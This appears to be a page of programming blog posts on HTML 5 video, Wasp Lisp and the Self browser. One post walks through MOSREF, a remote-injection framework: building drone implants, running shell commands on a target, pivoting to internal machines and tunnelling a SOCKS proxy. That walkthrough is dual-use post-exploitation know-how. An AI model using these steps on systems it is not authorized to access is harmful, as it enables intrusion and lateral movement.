Bluish Coder

Programming Languages, Martials Arts and Computers. The Weblog of Chris Double.


LCA 2010 talk about implementing HTML 5 video in Firefox

Last month I attended 2010 and gave a talk on the different paths we took implementing HTML 5 video in Firefox. I wrote the talk using Eric Meyer's S5 Slide system with the video demos embedded or linked from the slides themselves. You can view the slides here: To see the videos you'll need to be running a browser that supports HTML 5 video and the Ogg Theora codec (Chrome, Firefox, Opera alpha builds, Safari with a plugin).

Tags: mozilla  video 


Moving away from blogger

Blogger are deprecating their ftp publishing support and are recommending users to switch to their custom domain feature where they host the blog files for you. I prefer to keep my posts on my own server so will be switching weblog systems in the near future.

This will break existing links to Atom feeds for specific labels (eg. the feed for Mozilla specific posts) as they are on a blogger controlled domain. So if you're reading this through one of those Atom feeds and want to continue with it then you might want to switch to:[tagname]/atom.xml

For example, the Mozilla specific posts will be in

My existing posts will remain at their current URL's.

Tags: mozilla 


Using the Wasp Lisp Secure Remote Injection Framework (MOSREF)

MOSREF is a secure remote injection framework written in Wasp Lisp (which I previously wrote about here). With MOSREF you have a 'console' program running which can create dones applications that are run on a target system.

The console and drones can communicate with each other, executing shell commands or Wasp Lisp code. Drones can create other drones to 'bridge' bridge communications so the console can send commands to drones it is not directly connected too.

Lisp code can be compiled and sent to drones to execute. One of the 'built in' capabilities is a Socks proxy server. This can be run on a drone and data is tunneled to the console which the controller can use as a socks proxy.

MOSREF isn't built by default with Wasp. To build it you need to run 'waspc' to compile and create an executable (example assumes you are in the root of the Wasp source directory):

$ cd mod
$ waspc -exe ../mosref bin/mosref
BUILD: bin/mosref
BUILD: core/macro
BUILD: core/config
BUILD: site/config
BUILD: mosref/cmd/with
BUILD: mosref/cmds
BUILD: bin/mosref
$ chmod +x ../mosref
$ rlwrap ../moseref
console> help
Commands: clear <key> ...
          cp <src-file> <dst-file>
          do <lisp-expr>
          drone <file> <id> <platform>
          help [i<command>]
          load <path>
          on <node-id> [<command>]
          proxy [<portno> [<secret>]]
          recover <id>
          set [<key>[=<value>] [<command>]]
          sh <cmd>
          with <key>[=<value>] [<command>]

The first thing you need to do on the running console is set the IP address and the port it will listen on (Replacing xx.xx.xx.xx with the IP address):

console> set addr=xx.xx.xx.xx
console> set port=10000

Now you need to create a drone executable to be run on the target system:

console> drone drone1 foo linux-x86
Drone executable created.
Listening for drone on 10000...

This creates an executable for Linux systems called 'drone1'. It is given the name node name 'foo'. It will show in the list of nodes available from the console:

console> nodes
NODES: console online address: xx.xx.xx.xx port: 10000
       foo offline

When the 'drone1' executable is run on a target system it will connect to the console using an encrypted connection. You will need to find a way to copy and run the executable onto the target. The following shows it being run on the target:

target$ ./drone1
  DRONE: Preparing keys...
  DRONE: Sending Drone Public Key...
  DRONE: Sending Drone IV...
  DRONE: Reading Console IV...
  DRONE: Confirming Console IV...
  DRONE: Waiting for Console to confirm Drone IV...
  DRONE: Affiliation complete....

The connection will show on the console:

console> nodes
NODES: console online address: xx.xx.xx.xx port: 10000
       foo online

Notice it shows 'foo' is now online. It's now possible to execute commands on the target machine by sending them to the drone. Using 'sh' you can execute shell commands. From the console:

console> on foo sh ifconfig
eth0      Link encap:Ethernet  HWaddr ...
          inet addr:yy.yy.yy.yy
          RX bytes:2458924520 (2.2 GB)  TX bytes:2458924520 (2.2 GB)
console> on foo set addr=yy.yy.yy.yy
console> on foo set port=10000

Here we execute 'ifconfig' on the target so we can find out the IP address. The output of 'ifconfig' is sent back to the console. Using this information the addr and port is set on the drone. This can be used to have the target create new drones on internal machines that only it can access. It will then act as a bridge between the console and the internal machine.

As well as running shell commands you can run Wasp Lisp code:

console> on foo do (+ 1 2)
:: 3
console> on foo load lib/
:: spawn-http-file-server
console> on foo do (offer-http-file 2080 "/test" "text/plain" "Hello world!")
:: [queue 824A098]

Using 'on foo do' we compile a Lisp expression and send it to 'foo' to be run. In this case a simple addition. 'on foo load' will load a Lisp file located on the console, compile it, and send the byte code to be run on 'foo'. Then we 'on foo do' to run a function contained in that file on the 'foo' machine. In this case, it runs a simple webserver. Any Lisp code can be sent and run.

It's possible to copy files between nodes too. In this next example we create another drone that will be run on a machine internal to the network that the target is on. Note that the build is performed on the console so we need to copy the executable from there to the target.

console> on foo drone drone2 bar linux-x86
Drone executable created.
Listening for drone on 10000...
console> cp console:/home/console/waspvm/mod/drone2 foo:/tmp/drone2
Copy from console:/home/console/waspvm/mod/drone2 to foo:/tmp/drone2

Using some magic means (an exploit, copying file using shell commands on the target drone, etc) we get 'drone2' running on another machine available internally on the target network:

target2$ ./drone2
  DRONE: Preparing keys...
  DRONE: Sending Drone Public Key...
  DRONE: Sending Drone IV...
  DRONE: Reading Console IV...
  DRONE: Confirming Console IV...
  DRONE: Waiting for Console to confirm Drone IV...
  DRONE: Affiliation complete....

From the console we now see the 'bar' node:

console> nodes
NODES: bar online
       console online address: xx.xx.xx.xx port: 10000
foo online address: yy.yy.yy.yy port: 10000

MOSREF has a 'proxy' command that lets you set up a Socks 4 proxy on the console that tunnels traffic to and from a target node. Here we set up a proxy to the 'bar' node:

console> on bar proxy 5000
SOCKS Proxy created, listening on port 5000.

This will result in the 'console' machine having a Socks 4 proxy running on port 5000. If you configure Firefox to use this proxy you can access local webservers available from the internal network that 'bar' can see. Note that 'console' can't see 'bar' directly. It is tunnelling traffic to 'foo', from there to 'bar', then back from 'bar' to 'foo' and to 'console.

The source for MOSREF is in the Wasp Lisp distribution on github and makes for a good body of Wasp Lisp code for learning.

Tags: waspvm 


Wasp Lisp - a Small Scheme-like Lisp

Wasp Lisp is a small Scheme-like Lisp implementation developed by Scott Dunlop. It features a lightweight concurrency model (with similarities to Erlang and Termite).

Wasp Lisp was originally derived from MOSREF - the Mosquito Secure Remote Execution Framework. It includes an implementation of MOSREF so can do similar things that the original was built for.

Wasp feels a lot like Scheme. It has a REPL which you can use to try Lisp interactively. You can spawn lightweight threads and use channels to communicate between threads. Here's a simple example with a thread that loops forever, waits for data to be sent to a channel and then prints that out. From the REPL strings are interactively sent to the channel:

$ rlwrap ../wasp
>> (define channel (make-queue))
:: [queue 98154C0]
>> (define (looper channel)
..   (forever
..     (define data (wait channel))
..     (print data)))
:: looper
>> (spawn looper channel)
:: [process looper]
>> (send "hello\n" channel)
:: [queue-output 9815500]
>> (send "world\n" channel)
:: [queue-output 9815500]

Threads are co-operative in Wasp. You need to manually yield to switch from a thread. The following example doesn't manually yield and will constantly print 'a' to the terminal:

    (lambda () 
      (forever (print "a\n"))))
    (lambda () 
      (forever (print "b\n")))))

To yield you use the 'pause' function. Adding this to the 'forever' loop in the example above will switch between the two threads:

    (lambda () 
        (print "a\n")))) 
    (lambda () 
        (print "b\n")))))

Wasp Lisp code can get compiled to a compact bytecode format using the 'waspc' command. This can produce a binary executable for the platform:

$ cat >
(define (main)
  (print "hello world!\n"))
$ waspc -exe hello
BUILD: test
BUILD: core/macro
BUILD: core/config
BUILD: site/config
BUILD: core/file
BUILD: core/module
BUILD: core/io
BUILD: core/macro
BUILD: core/config
BUILD: site/config
BUILD: core/file
BUILD: core/module
BUILD: core/io
BUILD: test
$ chmod +x hello
$ ./hello
hello world!

There is quite a bit of example code, including a simple HTTP server:

$ rlwrap ../wasp
>> (import "lib/http-file-server")
:: #t
>> (offer-http-file 2080 "/test" "text/plain" "Hello world!")
:: [queue 985A1F0]

This serves the text 'Hello world!' when http://localhost:2080/test is requested. The Wasp VM site has an informal speed test of serving data comparing against THTTPD.

Wasp builds and runs on Linux, Mac OS X and Windows. Instructions for building and links to other information are here. The source is available on github. libevent is needed to build.

Tags: waspvm 


Displaying images with Self

The Self source code has some example programs, one of which is a web browser. This was developed quite a long time ago and is unable to nicely display most pages on the modern web but it does a reasonable job of basic pages. On the Linux port there were some problems with displaying images however. I tracked this down to two issues:

  • It only natively decoded image formats that aren't really used on the web (Sun Raster format for example). The GIF and JPG handling code spawned external programs, which I didn't have on my Linux install, to convert to a format it could handle before displaying.
  • There was a bug in the color management code on X11 for displays greater than 8 bit.

The first was a quick fix by changing the programs that it used to do the conversion to one readily available on Linux. I changed it to use the Image Magick 'convert' program. This enabled displaying code in an imageMorph by setting the image for the morph:

setImage: ui2Image copyFromGIFFile: 'test.gif'

I tracked the second issue down to code that was sending a message to an object that didn't understand that message (Static typing fans can say 'I told you so' here). Self has a 'paintManager' which handles color mapping for displays that can't display a large number of colors. On 8 bit displays this is a 'paintManager'. On displays with more colors it's a 'unmappedPaintManager'. The latter doesn't have some of the slots of the former and there was code trying to do this. I changed this to check if the paintManager instance can do color mapping before sending the messages.

With that change the web browser could display images. An example page that works with the browser (one of the few...), and code to display it:

'' asURL getPageForUser

The patches with these fixes are available from the webbrowser branch of my fork of the Self git repostory on github. The fixes were only a few lines of code.

I did a short screencast showing loading image morph's and displaying the web page in the browser. And before you say, "wow, that GUI looks so 90's", don't forget - it was.

Tags: self 

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